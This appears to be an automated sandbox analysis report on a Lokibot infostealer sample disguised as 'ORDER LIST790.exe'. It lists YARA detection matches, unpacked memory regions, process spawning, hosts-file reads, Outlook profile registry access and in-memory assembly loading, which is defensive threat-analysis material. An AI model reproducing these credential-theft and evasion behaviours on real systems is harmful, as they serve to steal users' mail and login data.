          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\ORDER LIST790.exeCode function: 0_2_018EC214
          Source: C:\Users\user\Desktop\ORDER LIST790.exeCode function: 0_2_018EEBA8
          Source: C:\Users\user\Desktop\ORDER LIST790.exeCode function: 0_2_018EEBB8
          Source: ORDER LIST790.exe, 00000000.00000002.278553985.0000000007D20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000002.278832560.0000000007E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000002.278857766.0000000007F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000002.273358905.0000000003535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000002.274422627.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000002.274422627.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000003.260912699.0000000007C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000000.235829681.0000000000F86000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameParallelLoopSt.exe. vs ORDER LIST790.exe
          Source: ORDER LIST790.exe, 00000000.00000002.271014354.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER LIST790.exe
          Source: ORDER LIST790.exeBinary or memory string: OriginalFilenameParallelLoopSt.exe. vs ORDER LIST790.exe
          Source: ORDER LIST790.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ORDER LIST790.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\ORDER LIST790.exe "C:\Users\user\Desktop\ORDER LIST790.exe"
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER LIST790.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
          Source: ORDER LIST790.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\ORDER LIST790.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\ORDER LIST790.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: ORDER LIST790.exe, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.ORDER LIST790.exe.eb0000.0.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\Desktop\ORDER LIST790.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: ORDER LIST790.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ORDER LIST790.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR
          Source: ORDER LIST790.exe, Main.cs.Net Code: SafeHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.ORDER LIST790.exe.eb0000.0.unpack, Main.cs.Net Code: SafeHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\ORDER LIST790.exeCode function: 0_2_05865CF8 push eax; mov dword ptr [esp], ecx
          Source: initial sampleStatic PE information: section name: .text entropy: 7.320980599570163
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
